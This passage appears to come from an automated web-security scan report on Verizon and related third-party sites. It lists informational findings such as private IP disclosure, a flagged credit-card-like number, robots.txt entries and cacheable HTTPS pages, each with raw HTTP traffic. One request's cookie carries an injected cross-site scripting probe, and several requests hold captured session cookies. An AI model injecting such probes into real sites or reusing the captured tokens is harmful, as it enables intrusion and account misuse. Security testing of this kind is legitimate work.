Host:	http://www.facebook.com
Path:	/connect/prompt_feed.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.22.50

Request

GET /connect/prompt_feed.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

20.9. http://www.facebook.com/dialog/feed previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/dialog/feed

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.149.54

Request

GET /dialog/feed HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

20.10. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.24.42

Request

GET /plugins/like.php?href=http://www22.verizon.com/jobs/&send=false&layout=box_count&width=50&show_faces=true&action=like&colorscheme=light&font&height=65 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/jobs/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.24.42
X-Cnection: close
Date: Mon, 05 Sep 2011 22:18:54 GMT
Content-Length: 23220

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

20.11. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.157.61

Request

GET /plugins/like.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

20.12. http://www.facebook.com/profile.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/profile.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.151.33

Request

GET /profile.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

20.13. http://www.facebook.com/sharer.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/sharer.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.147.31

Request

GET /sharer.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/sharer/sharer.php
Pragma: no-cache
X-UA-Compatible: IE=edge
X-XSS-Protection: 0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.147.31
Connection: close
Date: Mon, 05 Sep 2011 22:36:09 GMT
Content-Length: 0

20.14. http://www.google.com/sdch/StnTz5pY.dct previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/sdch/StnTz5pY.dct

Issue detail

The following RFC 1918 IP address was disclosed in the response:

172.31.196.197

Request

GET /sdch/StnTz5pY.dct HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=EVKsY54L3WnLcFmjXPXAjOb3iwcJNbnm9_yqCmnH2krqQZeOGuxPy8UbS6Vs8VHIf45QwUrm5shcCN1vf85Xuiz3AKdzOfPR2Bwf553j-IKceDzXGdaLnM6gllEARyoL
If-Modified-Since: Sat, 03 Sep 2011 05:07:34 GMT

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Type: application/x-sdch-dictionary
Last-Modified: Sat, 03 Sep 2011 05:07:34 GMT
Date: Mon, 05 Sep 2011 22:21:41 GMT
Expires: Mon, 05 Sep 2011 22:21:41 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 124609

Domain: .google.com
Path: /search

<!doctype html> <head> <title> - Google Search</title> <script>window.google={kEI:" NMWJ_5AK_rfB8gw",kEXPI:"28505,288 30316,31303,31405",kCSI
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: YKq3QHbl0RwJ:www.autotrader.com/+used+cary4a-lQGHU2cJ:www.vehix.com/+used+car &hl=en&ct=clnk&gl=us&source=www.google.com onmousedown="return clk(this.hre
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache:rZQjSq2ux10J:translate.reference.com/+Hzpd6vNFcrsJ:translate.google.com/+ &hl=en&ct=clnk&gl=us&source=www.google.com','','','',' 9&hl=en&ct=clnk&gl=us&source=www.google.com','','',
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: &cd=3 onmousedown="return clk(this.href,'','','',' ')">
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: &hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','',' >
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache:H75rMPosXksJ:www.cars.com/+used+carOJ7l3PBi2ywJ:www.usedcars.com/+used+car1nPyaj3yx18J:www.orbitz.com/App/DisplayCarSearch+ &hl=en&ct=clnk&gl=us&source=ww
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: rnetlion.com/article/Direct-TV-vs-Dish-Network KvzX53GQf98J:www.directv.com/DTVAPP/content/My_Account OHG47yeqhSoJ:www.directv.com/DTVAPP/content/contact_us
...[SNIP]...

20.15. http://www.whitefence.com/static/Seymour.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.whitefence.com
Path:	/static/Seymour.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.0.139

Request

GET /static/Seymour.js HTTP/1.1
Host: www.whitefence.com
Proxy-Connection: keep-alive
Referer: http://www.connecttoverizon.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:19:07 GMT
Server: Apache
Vary: *
Cache-Control: max-age=86400
Expires: Tue, 06 Sep 2011 22:19:07 GMT
Last-Modified: Thu, 30 Sep 2010 22:20:37 GMT
ETag: "2b8556-49fd-4ca50d35"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Content-Length: 18941

/*
   Package: Seymour
       Revision $Id: Seymour.js 10919 2010-01-29 16:25:17Z evan $

       Native javascript client-side frontend for Skinner webservice. It uses no specific frameworks,
       and should be com
...[SNIP]...
seconds) allowed for a callback response, defaults to 5 seconds
       timeOut: 5000,
       // skinner web service to which all requests are sent, defaults to the load-balanced production instance.
       //url: '//10.0.0.139/cgi-bin/skinner.dll', // build-test skinner (on Tennessee)
       url: '//www.whitefence.com/scripts/server/skinner.php', // external skinner
//url: '//www.whitefence.com/cgi-bin/skinner.dl
...[SNIP]...

21. Credit card numbers disclosed previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/vzTracker/vzTracker.aspx

Issue detail

The following credit card number was disclosed in the response:

4049907096195

Issue background

Responses containing credit card numbers may not represent any security vulnerability - for example, a number may belong to the logged-in user to whom it is displayed. You should verify whether the numbers identified are actually valid credit card numbers and whether their disclosure within the application is appropriate.

Request

GET /vzTracker/vzTracker.aspx?appName=ECSP_OLH&type=1&requestUrl=http%3A//www22.verizon.com/residentialhelp/phone&referrer=http%3A//www22.verizon.com/residentialhelp/fiostv&Title=Verizon%20%7C%20Local%20%26%20Long%20Distance%20Phone&Lang=en-US&scrRes=1920X1200&scrdepth=16&id=4049907096195.966 HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: http://www22.verizon.com/residentialhelp/phone
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; NSC_xxx22_tqmbu_mcw=ffffffff895bc67c45525d5f4f58455e445a4a423660; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; PDSS=PflowId=680d1ca400d842e69be1848a9f3d28c5; DSS=flowId=f9688e84baaa4126acd87151b526b588; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; RecentlyVisited=Verizon%2520%257C%2520FiOS%2520TV@http%253A//www22.verizon.com/residentialhelp/fiostv%23Verizon%2520%257C%2520-%2520How%2520do%2520I%2520use%2520Ask%2520Verizon%253F@http%253A//www22.verizon.com/ResidentialHelp/Generic/Ask%252520Verizon/Getting%252520Started/124519.htm%23; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=VwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxAA==&IP=NQAwAC4AMgAzAC4AMQAyADMALgAxADAANgAsACAAOAAwAC4ANgA3AC4ANwA0AC4AMgAxADEALAAgADEAMQAyAC4ANgA0AC4AMQAuADEAMAA3AA==; vzinhomeagent=GUID=OQAwADQAMgAzAGQAMAA1AC0ANwA3ADAAMgAtADQANwAzAGUALQBhAGQAMAA3AC0ANQA3AGMAYwBkADUAYgAyAGMAMQA0ADYA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMQA3ADgAMQA2ADMAOQA5ADwALwBUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4A&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIAUwBUAEIARgByAG8AegBlAG4A&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIAUwBUAEIARgByAG8AegBlAG4APAAvAFQAZQB4AHQAPgA8AC8AVQBzAGUAcgBUAGUAeAB0AD4A&AccountIDAuthMode=bgBvAA==; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc65945525d5f4f58455e445a4a423660; WT_FPC=id=27bb86d4bd1c3b1dd581315275882795:lv=1315275882795:ss=1315275882795; vzapps=ZIPCODE=10010; BPSPANISH=N; urlreferer=http://smallbusiness.verizon.com/products/voice/plans.aspx; NSC_xxx22_gztncja_80_mcw=ffffffff895bc6ba45525d5f4f58455e445a4a423660; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; SrcClientID=smallbusiness.verizon.com; vzAppID=; LOB_CATEGORY=; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; ContextInfo_TV=FiOSTV; IHAClientIP=112.64.2.103; AimsChatURL_Cookie=https://collaborateext.verizon.com; PageTitle=Livechat; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=110ed<script>alert(document.cookie)</script>af81f92fd39; CMS_TimeZoneOffset=300; CP=null*; refURL=http://www22.verizon.com/residentialhelp/phone

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html
Expires: Mon, 05 Sep 2011 22:40:08 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:40:08 GMT
Content-Length: 959
Connection: keep-alive

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
   <HEAD>
       <title>vzTracker</title>
       <meta content="Microsoft Visual Studio 7.0" name="GENERATOR">
       <meta content="C#" na
...[SNIP]...
entialhelp%2fphone&referrer=http%3a%2f%2fwww22.verizon.com%2fresidentialhelp%2ffiostv&Title=Verizon+%7c+Local+%26+Long+Distance+Phone&Lang=en-US&scrRes=1920X1200&scrdepth=16&id=4049907096195.966" id="Form1">
...[SNIP]...

22. Robots.txt file previous next
There are 14 instances of this issue:

http://ad.yieldmanager.com/pixel
http://cache.vzw.com/stylesheets/fonts.css
http://ehg-verizon.hitbox.com/HG
http://g-pixel.invitemedia.com/gmatcher
http://pixel.mathtag.com/event/img
http://pixel.quantserve.com/pixel
http://r.turn.com/server/beacon_call.js
http://s.xp1.ru4.com/meta
http://segment-pixel.invitemedia.com/pixel
http://verizon.com/
http://verizonwireless.tt.omtrdc.net/m2/verizonwireless/mbox/standard
http://www.googleadservices.com/pagead/conversion/1032222048/
http://www.verizonwireless.com/b2c/index.html
http://www22.verizon.com/

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.

22.1. http://ad.yieldmanager.com/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.yieldmanager.com
Path:	/pixel

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.yieldmanager.com

Response

HTTP/1.0 200 OK
Date: Mon, 05 Sep 2011 22:14:39 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Mon, 05 Sep 2011 22:14:39 GMT
Pragma: no-cache
Content-Length: 26
Content-Type: text/plain
Age: 0

User-agent: *
Disallow: /

22.2. http://cache.vzw.com/stylesheets/fonts.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cache.vzw.com
Path:	/stylesheets/fonts.css

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cache.vzw.com

Response

HTTP/1.0 200 OK
Server: None
Content-Type: text/plain
Last-Modified: Fri, 10 Sep 2010 21:19:21 GMT
Content-Length: 558
ETag: "22e-4c8aa0d9"
Accept-Ranges: bytes
Date: Mon, 05 Sep 2011 22:14:30 GMT
Connection: close

User-agent: *
Disallow: /cgi-bin
Disallow: /scripts
Disallow: /Scripts
Disallow: /perl
Disallow: /images_b2c
Disallow: /b2b_images
Disallow: /images
Disallow: /img
Disallow: /*.gif$
Disallow: /*.jpg$

...[SNIP]...

22.3. http://ehg-verizon.hitbox.com/HG previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ehg-verizon.hitbox.com
Path:	/HG

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ehg-verizon.hitbox.com

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:13:51 GMT
Server: Hitbox Gateway 9.3.6-rc1
Connection: close
Cache-Control: max-age=3600, private, proxy-revalidate
Expires: Mon, 05 Sep 2011 23:13:51 GMT
Content-Type: text/plain
Content-Length: 36

User-agent: *
Disallow: /Diagnostic

22.4. http://g-pixel.invitemedia.com/gmatcher previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://g-pixel.invitemedia.com
Path:	/gmatcher

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: g-pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 05 Sep 2011 22:14:42 GMT
Content-Type: text/plain
Content-Length: 26

User-agent: *
Disallow: /

22.5. http://pixel.mathtag.com/event/img previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.mathtag.com
Path:	/event/img

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pixel.mathtag.com

Response

HTTP/1.0 200 OK
Cache-Control: no-cache
Connection: close
Content-Type: text/html
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 pao-pixel-x4 pid 0x7f48 32584
Connection: keep-alive
Content-Length: 26

User-agent: *
Disallow: *

22.6. http://pixel.quantserve.com/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.quantserve.com
Path:	/pixel

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Tue, 06 Sep 2011 22:14:38 GMT
Content-Type: text/plain
Content-Length: 26
Date: Mon, 05 Sep 2011 22:14:38 GMT
Server: QS

User-agent: *
Disallow: /

22.7. http://r.turn.com/server/beacon_call.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r.turn.com
Path:	/server/beacon_call.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: r.turn.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Date: Mon, 05 Sep 2011 22:14:38 GMT
Connection: close

User-agent: *
Disallow: /app
Disallow: /server

22.8. http://s.xp1.ru4.com/meta previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://s.xp1.ru4.com
Path:	/meta

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: s.xp1.ru4.com

Response

22.9. http://segment-pixel.invitemedia.com/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://segment-pixel.invitemedia.com
Path:	/pixel

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: segment-pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 05 Sep 2011 22:14:39 GMT
Content-Type: text/plain
Content-Length: 26

User-agent: *
Disallow: /

22.10. http://verizon.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://verizon.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: verizon.com

Response

HTTP/1.1 200 OK
Server: Netscape-Enterprise/6.0
Date: Mon, 05 Sep 2011 22:27:39 GMT
Content-length: 50
Content-type: text/plain
Last-modified: Mon, 26 Feb 2001 17:05:42 GMT
Accept-ranges: bytes
Connection: close

User-agent: *
Disallow: /eweb/
Disallow: /dayone/

22.11. http://verizonwireless.tt.omtrdc.net/m2/verizonwireless/mbox/standard previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://verizonwireless.tt.omtrdc.net
Path:	/m2/verizonwireless/mbox/standard

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: verizonwireless.tt.omtrdc.net

Response

HTTP/1.1 200 OK
Server: Test & Target
Content-Type: text/plain
Date: Mon, 05 Sep 2011 22:14:33 GMT
Accept-Ranges: bytes
ETag: W/"25-1309299047000"
Connection: close
Last-Modified: Tue, 28 Jun 2011 22:10:47 GMT
Content-Length: 25

User-agent: *
Disallow: /

22.12. http://www.googleadservices.com/pagead/conversion/1032222048/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.googleadservices.com
Path:	/pagead/conversion/1032222048/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.googleadservices.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/plain
Last-Modified: Thu, 11 Aug 2011 21:56:40 GMT
Date: Mon, 05 Sep 2011 22:14:42 GMT
Expires: Mon, 05 Sep 2011 22:14:42 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

22.13. http://www.verizonwireless.com/b2c/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verizonwireless.com
Path:	/b2c/index.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.verizonwireless.com

Response

HTTP/1.1 200 OK
Server: None
Date: Mon, 05 Sep 2011 22:14:31 GMT
Content-type: text/plain
Last-modified: Tue, 16 Oct 2007 03:07:10 GMT
Content-length: 558
Etag: "22e-47142ade"
Accept-ranges: bytes
Connection: keep-alive

User-agent: *
Disallow: /cgi-bin
Disallow: /scripts
Disallow: /Scripts
Disallow: /perl
Disallow: /images_b2c
Disallow: /b2b_images
Disallow: /images
Disallow: /img
Disallow: /*.gif$
Disallow: /*.jpg$

...[SNIP]...

22.14. http://www22.verizon.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www22.verizon.com

Response

HTTP/1.0 200 OK
Content-Length: 173
Content-Type: text/plain
Content-Location: http://www22.verizon.com/robots.txt
Last-Modified: Thu, 10 Apr 2008 03:18:56 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Expires: Mon, 05 Sep 2011 22:13:38 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:13:38 GMT
Connection: close

User-agent:    *
Allow:        /
Disallow:    /dslmembersonly
Disallow:    /ForYourHome/voip/
Disallow:    /ForYourHome/VOIP/
Disallow:    /ForYourHome/Voip/
Disallow:    /ForYourhome/voip/

23. Cacheable HTTPS response previous next
There are 36 instances of this issue:

https://12.xg4ken.com/media/redir.php
https://collaborateext.verizon.com/aims/encore/VZCTC.serv
https://collaborateext.verizon.com/aims/encore/VzVAgent.jsp
https://collaborateext.verizon.com/aims/encore/VzVirtualAgent.jsp
https://collaborateext.verizon.com/aims/html/blank.html
https://dashboard.opinionlab.com/pv_controlboard.html
https://enterprisecenter.verizon.com/enterprisesolutions/Default/tiles/LoginFlash/fonts/fonts_en.swf
https://enterprisecenter.verizon.com/enterprisesolutions/Default/tiles/LoginFlash/swf/AB_heroGraphic_en.swf
https://enterprisecenter.verizon.com/enterprisesolutions/Default/tiles/LoginFlash/vec_login_homepage_2010.swf
https://enterprisecenter.verizon.com/enterprisesolutions/Default/tiles/LoginFlash/vec_login_homepage_2010_preloader.swf
https://enterprisecenter.verizon.com/enterprisesolutions/Includes/Shared/struts/TealeafTarget.jsp
https://enterprisecenter.verizon.com/enterprisesolutions/default/selfreg/submitEnrollmentProfileInfo.do
https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/includes/s.gif
https://enterprisecenter.verizon.com/future/vzw/css_reference_PatLib/includes/css/print.css
https://enterpriseportalcontent.mci.com/CC/public/Login/en-US/Enroll.htm
https://seal.verisign.com/getseal
https://secure.opinionlab.com/ccc01/comment_card.asp
https://secure.opinionlab.com/ccc01/comment_card_json_4_0_b.asp
https://secure.opinionlab.com/rate36_json.asp
https://secure.opinionlab.com/rate36s.asp
https://signin.verizon.com/sso/ForgotPassword
https://signin.verizon.com/sso/ForgotUserIdAndPwd
https://signin.verizon.com/sso/ResetAccount
https://signin.verizon.com/sso/RetrieveUserID
https://signin.verizon.com/sso/forgotFlows/locateBAN.jsp
https://www.bbb.org/online/consumer/cks.aspx
https://www.whitefence.com/WebObjects/WhiteFence.woa/wa/login
https://www.whitefence.com/WebObjects/WhiteFenceService.woa/wa/forgotPassword
https://www22.verizon.com/
https://www22.verizon.com/ForYourHome/VzRepair/VzIHA/TealeafTarget.aspx
https://www22.verizon.com/content/verizonglobalhome/res_signin.aspx
https://www22.verizon.com/includes/cache/15/blank.html
https://www22.verizon.com/includes/cache/getwb31.asp
https://www22.verizon.com/includes/javascript/commonjs/
https://www22.verizon.com/includes/javascript/oo_engine_c.js
https://www22.verizon.com/myverizon/

Issue description

Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.

Issue remediation

The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:

Cache-control: no-store
Pragma: no-cache

23.1. https://12.xg4ken.com/media/redir.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://12.xg4ken.com
Path:	/media/redir.php

Request

GET /media/redir.php HTTP/1.1
Host: 12.xg4ken.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:34:38 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

23.2. https://collaborateext.verizon.com/aims/encore/VZCTC.serv previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://collaborateext.verizon.com
Path:	/aims/encore/VZCTC.serv

Request

